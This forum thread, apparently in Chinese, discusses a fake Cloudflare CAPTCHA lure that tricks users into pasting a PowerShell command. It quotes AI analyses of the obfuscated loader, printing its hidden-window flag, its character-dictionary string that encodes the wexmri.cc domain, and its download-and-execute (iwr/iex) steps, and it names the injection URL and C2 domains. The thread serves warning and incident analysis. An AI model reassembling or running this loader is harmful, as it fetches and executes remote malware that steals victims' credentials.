Cloudflare的最新人机验证，好高级的感觉！（中木马了，我是傻逼）

木马，给你个AI回答
这段代码是一段高度混淆的 PowerShell 脚本，通常用于恶意软件加载器（Malware Loader）。它的主要目的是绕过安全软件的检测，从远程服务器下载并执行恶意代码。

下面我为你详细拆解这段代码的含义和运作原理：

1. 隐藏执行窗口

powershell.exe -Wi MINI

• -Wi MINI: 这是 -WindowStyle Minimized（最小化窗口）或 -WindowStyle Hidden（隐藏窗口）的缩写。
• 目的: 让受害者在不知情的情况下运行脚本，不在桌面上弹出明显的命令行窗口。

2. 定义混淆字典 ($JD)

$JD='dUBLxgwGegPWexMRI.ccepIpZQ'

• 含义: 这是一个包含看似随机字符的字符串。
• 目的: 攻击者不直接写出敏感命令（如 IEX 或 Invoke-WebRequest），而是通过从这个字符串中“拼凑”字符来组装命令。这样可以避开基于特征码（Signature-based）的杀毒软件扫描。

3. 动态组装命令 ($fQ)

$fQ=.($JD[((-68)+(97))]+$JD[22]+$JD[11]) ($JD.Substring(((99)-(81)),(18)/(2))) -uSEBa

这部分代码通过数学运算计算索引，从 $JD 字符串中提取字符。

• 运算逻辑:

• (-68)+(97) = 29 (注意：原始字符串长度可能被截断或变种，通常这里指向某个特定字符)。

• $JD[22]、$JD[11]：提取特定位置的字母。

• **参数 -uSEBa**: 这是一个非常明显的特征。它对应 PowerShell Invoke-WebRequest 命令的参数 -UseBasicParsing。

• 推测结果: 这行代码的实际含义通常是构造并执行类似 iex (Invoke-Expression) 或者 iwr (Invoke-WebRequest) 的别名，并带上 -UseBasicParsing 参数。

4. 执行下载的内容

.($fQ.Substring(1,3))($fQ)

• 逻辑: 这里再次对变量 $fQ 进行截取，然后使用 . (点号) 调用操作符来执行它。
• 目的:

1. $fQ 此时可能包含了从网上下载下来的恶意代码字符串。
2. 脚本试图从这个字符串中再次提取出执行命令（通常是 iex），然后运行下载下来的整个脚本。

总结：这段代码想干什么？

如果将这段代码“翻译”成人类可读的 PowerShell，它的逻辑大致如下：

# 伪代码演示逻辑
PowerShell -隐藏窗口
$命令 = "Invoke-WebRequest" (通过字符拼接得到)
$下载内容 = 执行 $命令 -Uri "恶意网址..." -UseBasicParsing
Invoke-Expression $下载内容 (执行下载回来的病毒代码)

安全建议：

1. 不要运行: 绝对不要在你的计算机上复制粘贴或运行这段代码。
2. 来源排查: 如果你在日志中看到这段代码，说明该机器可能遭受了攻击（或尝试攻击）。如果是你下载的文件里包含这个，请立即删除。
3. 断网扫描: 如果这是在一台正在运行的机器上发现的，建议断开网络并进行全面的病毒扫描。

下一步建议

如果你是在分析日志（Log Analysis）或者做安全研究（CTF），想要知道它具体下载了什么，我可以教你如何**安全地去混淆（Deobfuscate）**这段代码（仅打印出它想访问的 URL，而不执行它）。你需要这个帮助吗？

载入史诗级般的诗歌，永流传。合影一下。

• 从好奇到相信
• 再到震惊！
• 再到迟疑的相信
• 最后到相信
• 果断断网的决绝！
• 如此这般的....的跌宕起伏，过山车般的心路历程23333

@fdiskmbr #155

The bintools[.]io website appears to have been hijacked by someone who injected the malicious captcha code. The Javascript popup creation code is loaded from https://www.investonline.in/js/jq.php (probably another hacked website) and it's heavily obfuscated.

Both website and powershell payload call to wexmri[.]cc domain I was also able to get one with xmri[.]network once. Those domains decide who actually gets the popup based on browser parameters (probably user agent and IP) - that's why some were not able to get the fake captcha window.

Both domains seem to be pointing to IP addresses hosted under AS215929 (datacampus.hk). Does anyone know them? They seem to be Chinese. Maybe worth reporting this, or are they involved?

bintools[.]io网站似乎已被黑客劫持，其注入了恶意验证码代码。用于创建JavaScript弹窗的代码从https://www.investonline.in/js/jq.php（可能是另一个被黑网站）加载，且经过高度混淆处理。

该网站及PowerShell有效载荷均调用wexmri[.]cc域名，我曾一次获取到xmri[.]network的调用记录。这些域名会根据浏览器参数（可能是用户代理和IP）决定实际弹窗对象——这解释了为何部分用户未触发虚假验证码窗口。

这两个域名似乎都指向由AS215929（datacampus.hk）托管的IP地址。有人了解这些地址吗？它们似乎属于中国。或许值得报告此事。

@fdiskmbr #9 你是真傻？做木马的，有技术的，模仿一下cf样式不是很简单

很高级，就是可以给自己电脑下木马

？这个是假的吧 不是cloudflare的验证 而是植入木马的。

别执行！这是诈骗网站

@Sakura #1 发布于2026/1/29 14:19:45
？这个是假的吧 不是cloudflare的验证 而是植入木马的。

我第一反应，也是这个，但是仔细看，这个确实是cloudflare的验证机制。

验证个机器人还用得到powershell?

~~

我操！！！

代码行为深度解析
这段代码经过了混淆处理，旨在躲避安全软件的扫描。我们可以将其拆解来看：

隐藏窗口运行：powershell.exe -Wi MINI 是 -WindowStyle Minimized 的缩写，意图在后台静默运行，不让用户察觉。

字符串解密：

$JD='dUBLxgwGegPWexMRI.ccepIpZQ' 是原始乱码字符串。

通过复杂的数学运算（如 (-68)+(97) 等）定位字符。

解密后的核心指令通常是 IEX (Invoke-Expression)，这个命令的作用是执行从远程服务器下载的任何指令。

远程下载并执行：

$JD.Substring(18, 9) 部分截取出的字符通常指向一个恶意链接。

-uSEBa 是 -UseBasicParsing 的缩写，常配合 Invoke-WebRequest 使用，从网络下载恶意二进制文件或木马。

最终目的：这段代码一旦执行，通常会自动下载并安装窃密木马（Infostealer），用于盗取你浏览器中的密码、Cookie、加密货币钱包或社交账号 Session。

⚠️ 重要安全建议
千万不要运行：如果你还没有运行，请立即关闭该网页。

如果已经运行：

断开网络：防止木马进一步上传你的个人数据。

修改密码：在另一台干净的设备上修改你所有的重要账号密码（尤其是邮箱、银行和支付账号）。

全盘扫描：使用专业的杀毒软件（如 Windows Defender, Malwarebytes 等）进行全盘深度查杀。

检查启动项：检查任务管理器中的“启动”页签，看是否有可疑的 Powershell 或未知程序。

这个框，确实是，cloudflare验证区域弹出来的。